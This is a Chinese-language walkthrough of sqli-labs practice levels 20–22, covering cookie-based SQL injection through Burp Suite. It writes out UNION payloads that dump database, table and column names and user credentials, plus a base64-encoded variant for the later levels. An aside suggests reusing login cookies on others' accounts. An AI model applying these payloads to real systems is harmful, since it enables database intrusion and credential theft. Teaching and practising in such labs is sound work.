less-20
第20关成功登陆之后会产生一个cookie,作为下次登陆的凭证(可以用于登陆其他人的qq空间)
这里我依然使用burp suite,其实火狐和谷歌上有许多插件可以改http头和cookie(例如chrome工具: Cookie Editor),掌握一个即可
抓包后发送到repeater:
改cookie:uname=admin',报错,说明存在注入漏洞
之后构造语句还是老步骤
查看列数:uname=' order by 4 # (注意闭合sql语句)
判断回显位置:uname='union select 1,2,3#
爆库:uname='union select 1,2,group_concat(schema_name)from information_schema.schemata#
爆表:uname='union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'#
爆列:uname='union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'#
爆信息:uname='union select 1,2,group_concat(concat_ws('-',username,password))from security.users#
less-21
输入用户名密码登陆:
抓包观察数据:
可以看到cookie的内容变成加密的形式,百度后用base64加解密可以解决:
https://base64.us/
把我们需要输入的语句先进行一遍base64加密即可:
例如判断当前数据库:uname=')union select 1,2,database()#转义之后:
除了闭合方式和加一步转码外,步骤与上一关完全一致,不再赘述。
less-22
本关抓包并测试发现数据格式变为“”,其他完全一样
“ union select 1,2,database()#转义:InVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=
其他语句均相同!
1-22关为基础关,到此结束。